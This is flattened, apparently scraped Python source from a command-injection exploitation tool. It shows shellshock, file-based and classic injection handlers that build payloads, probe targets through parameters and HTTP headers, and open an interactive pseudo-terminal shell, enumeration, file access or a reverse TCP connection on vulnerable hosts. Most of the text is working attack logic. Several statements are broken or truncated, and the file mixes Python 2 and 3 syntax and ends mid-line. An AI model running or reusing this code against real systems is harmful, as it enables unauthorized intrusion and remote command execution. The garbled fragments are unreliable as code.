go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + settings.WARNING_SIGN + "You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp( ) while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options( ) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. shell = cmd_exec( url, cmd, cve, check_header, filename) if menu.options.verbose: print "" print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: pass else: shell = cmd_exec( url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n" continue break else: continue except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + settings.ERROR_SIGN + str( err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) header = {check_header : payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent )+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in no_result = False print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True : print "" while True: enumerate_again = raw_input("(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" sys.exit(0) else: # Pseudo-Terminal shell go_back = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: print "" gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL continue break else: continue except urllib2.HTTPError, err: print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response): shell = False counter = 1 vp_flag = True exit_loops = False no_result = True is_encoded = False stop_injection = False call_tmp_based = False next_attack_vector = False export_injection_info = False injection_type = "semi-blind command injection" technique = "file-based command injection technique" tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response) if not settings.LOAD_SESSION or settings.RETEST == True: TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) info_msg = "Trying to create a file in '" + settings.WEB_ROOT info_msg += "' for command execution results. " print(settings.print_info_msg(info_msg)) i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. if settings.LOAD_SESSION: try: settings.FILE_BASED_STATE = True url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) checks.check_for_stored_tamper(payload) OUTPUT_TEXTFILE = TAG + ".txt" session_handler.notification( url, technique, injection_type) if technique == "tempfile-based injection technique": #settings.LOAD_SESSION = True tfb_handler.exploitation( url, timesec, filename, tmp_path, http_request_method, url_time_response) except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print(settings.print_critical_msg(err_msg)) raise SystemExit() if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, timesec, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if alter_shell: payload = fb_payloads.decision_alter_shell( separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision( separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification( payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") print(settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating payload for the injection..." print(settings.print_info_msg(info_msg)) print(settings.print_payload(payload)) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = fb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent HTTP Header Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = fb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer HTTP Header Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to Referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = fb_injector.referer_injection_test( url, vuln_parameter, payload) # Host HTTP Header Injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to Host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( response = fb_injector.host_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom HTTP header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) response = fb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test( payload, http_request_method, url) # Find the directory. output = fb_injector.injection_output( url, OUTPUT_TEXTFILE, timesec) time.sleep(timesec) try: # Check if defined extra headers. request = _urllib.request.Request(output) headers.do_check(request) # Evaluate test results. output = _urllib.request.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and shell[ 0] == TAG and not settings.VERBOSITY_LEVEL >= 1: percent = settings.SUCCESS_MSG info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if len(shell) == 0: raise _urllib.error.HTTPError( url, 404, 'Error', {}, None) except _urllib.error.HTTPError as e: if str(e.getcode() ) == settings.NOT_FOUND_ERROR: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split( menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, timesec, filename, tmp_path, http_request_method, url_time_response) raise # Show an error message, after N failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == int(menu.options.failed_tries ) and no_result == True: tmp_path = check_tmp_path( url, timesec, filename, http_request_method, url_time_response) warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.WEB_ROOT + "'." sys.stdout.write( "\r" + settings.print_warning_msg( warn_msg)) print("") while True: if not menu.options.batch: question_msg = "Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > " tmp_upload = _input( settings. print_question_msg( question_msg)) else: tmp_upload = "" if len(tmp_upload) == 0: tmp_upload = "y" if tmp_upload in settings.CHOICE_YES: exit_loops = True settings.TEMPFILE_BASED_STATE = True call_tfb = tfb_controller( no_result, url, timesec, filename, tmp_path, http_request_method, url_time_response) if call_tfb != False: return True else: if no_result == True: return False else: return True elif tmp_upload in settings.CHOICE_NO: break elif tmp_upload in settings.CHOICE_QUIT: print("") raise else: err_msg = "'" + tmp_upload + "' is not a valid answer." print( settings.print_error_msg( err_msg)) pass continue else: if exit_loops == False: if not settings.VERBOSITY_LEVEL >= 1: if str(float_percent ) == "100.0": if no_result == True: percent = settings.FAIL_STATUS else: percent = ".. (" + str( float_percent ) + "%)" else: percent = ".. (" + str( float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write( "\r" + settings.print_info_msg( info_msg)) sys.stdout.flush() continue else: continue else: raise elif str(e.getcode() ) == settings.UNAUTHORIZED_ERROR: err_msg = "Authorization required!" print( settings.print_critical_msg(err_msg) + "\n") raise SystemExit() elif str(e.getcode() ) == settings.FORBIDDEN_ERROR: err_msg = "You don't have permission to access this page." print( settings.print_critical_msg(err_msg) + "\n") raise SystemExit() except KeyboardInterrupt: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: if 'vuln_parameter' in locals(): # Delete previous shell (text) files (output) delete_previous_shell( separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except _urllib.error.URLError as e: warn_msg = "It seems that you don't have permissions to " warn_msg += "read and/or write files in '" + settings.WEB_ROOT + "'." sys.stdout.write( "\r" + settings.print_warning_msg(warn_msg)) err_msg = str(e).replace(": ", " (") + ")." if menu.options.verbose > 1: print("") print(settings.print_critical_msg(err_msg)) # Provide custom server's root directory. custom_web_root(url, timesec, filename, http_request_method, url_time_response) continue except: raise # Yaw, got shellz! # Do some magic tricks! if shell: settings.FILE_BASED_STATE = True found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if not settings.VERBOSITY_LEVEL >= 1 and \ not menu.options.alter_shell and \ not next_attack_vector: next_attack_vector = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = "Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if not settings.VERBOSITY_LEVEL >= 1: print("") else: checks.total_of_requests() # Print the findings to terminal. success_msg = "The" if len(found_vuln_parameter ) > 0 and not "cookie" in header_name: success_msg += " " + http_request_method success_msg += ('', ' (JSON)')[settings.IS_JSON] + ( '', ' (SOAP/XML)' )[settings.IS_XML] + the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split( " ")[0] + ") " + technique + "." print(settings.print_success_msg(success_msg)) sub_content = str(checks.url_decode(payload)) print(settings.print_sub_content(sub_content)) # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation( url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, timesec=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. new_line = True if settings.ENUMERATION_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input( "\n" + settings.print_question_msg( question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: fb_enumeration.do_check( separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # print("") break elif enumerate_again in settings.CHOICE_NO: new_line = False break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell( separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.enumeration_options(): fb_enumeration.do_check( separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if not menu.file_access_options( ) and not menu.options.os_cmd: if not settings.VERBOSITY_LEVEL >= 1 and new_line: print("") # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: if settings.ENUMERATION_DONE != True: print("") while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input( settings.print_question_msg( question_msg)) else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: fb_file_access.do_check( separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print("") break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell( separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.file_access_options(): # if not menu.enumeration_options(): # print("") fb_file_access.do_check( separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) print("") # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print("") fb_enumeration.single_os_cmd_exec( separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: # Delete previous shell (text) files (output) # if settings.VERBOSITY_LEVEL >= 1: # print("") delete_previous_shell( separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.VERBOSITY_LEVEL >= 1: print("") if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input( settings.print_question_msg( question_msg)) else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print("") print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if readline_error: checks.no_readline_module() while True: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) # if settings.VERBOSITY_LEVEL >= 1: # print("") if cmd.lower( ) in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE) if go_back and go_back_again == False: break if go_back and go_back_again: return True else: time.sleep(timesec) response = fb_injector.injection( separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Command execution results. shell = fb_injector.injection_results( url, OUTPUT_TEXTFILE, timesec) shell = "".join( str(p) for p in shell) if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd( url, cmd, vuln_parameter) if shell: if shell != "": # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, shell) print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n") if not shell or shell == "": if settings.VERBOSITY_LEVEL >= 1: print("") err_msg = "The '" + cmd + "' command, does not return any output." print( settings. print_critical_msg( err_msg) + "\n") elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) delete_previous_shell( separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass except KeyboardInterrupt: # if settings.VERBOSITY_LEVEL >= 1: print("") # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise if no_result == True: if settings.VERBOSITY_LEVEL == 0: print("") return False else: sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, timesec, filename, http_request_method, injection_type, technique): shell = False counter = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False if not settings.LOAD_SESSION: info_msg = "Testing the " + "(" + injection_type.split( " ")[0] + ") " + technique + ". " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) i = 0 # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: if whitespace == " ": whitespace = _urllib.parse.quote(whitespace) # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification( url, technique, injection_type): try: settings.CLASSIC_STATE = True url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) checks.check_for_stored_tamper(payload) except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print(settings.print_critical_msg(err_msg)) raise SystemExit() else: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision( separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace( settings.SINGLE_WHITESPACE, whitespace) # Perform payload modification payload = checks.perform_payload_modification( payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: print(settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) print(settings.print_payload(payload)) # Cookie header injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = cb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent HTTP header injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = cb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer HTTP header injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = cb_injector.referer_injection_test( url, vuln_parameter, payload) # Host HTTP header injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( response = cb_injector.host_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) response = cb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test( payload, http_request_method, url) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, timesec) # Evaluate test results. time.sleep(timesec) shell = cb_injector.injection_test_results( response, TAG, randvcalc) if settings.VERBOSITY_LEVEL == 0: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if shell == False: info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "." + " (" + str( float_percent) + "%)" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if float(float_percent) >= 99.9: if no_result == True: percent = settings.FAIL_STATUS else: percent = ".. (" + str( float_percent) + "%)" elif len(shell) != 0: percent = settings.info_msg else: percent = ".. (" + str( float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = " Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" # Check if defined POST data if not settings.USER_DEFINED_POST_DATA: found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) else: checks.total_of_requests() # Print the findings to terminal. info_msg = "The" if len(found_vuln_parameter ) > 0 and not "cookie" in header_name: info_msg += " " + http_request_method + "" info_msg += ('', ' (JSON)')[settings.IS_JSON] + ( '', ' (SOAP/XML)' )[settings.IS_XML] + the_type + header_name info_msg += found_vuln_parameter + " seems injectable via " info_msg += "(" + injection_type.split( " ")[0] + ") " + technique + "." print(settings.print_bold_info_msg(info_msg)) sub_content = str(checks.url_decode(payload)) print(settings.print_sub_content(sub_content)) # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation( url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, timesec=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACES[0] settings.LOAD_SESSION = False # Check for any enumeration options. new_line = True if settings.ENUMERATION_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input( "\n" + settings.print_question_msg( question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "Y" if enumerate_again in settings.CHOICE_YES: cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) #print(settings.SINGLE_WHITESPACE) break elif enumerate_again in settings.CHOICE_NO: new_line = False break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.enumeration_options(): cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) if not menu.file_access_options( ) and not menu.options.os_cmd and new_line: print(settings.SINGLE_WHITESPACE) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: if settings.ENUMERATION_DONE != True: print(settings.SINGLE_WHITESPACE) while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input( settings.print_question_msg( question_msg)) else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "Y" if file_access_again in 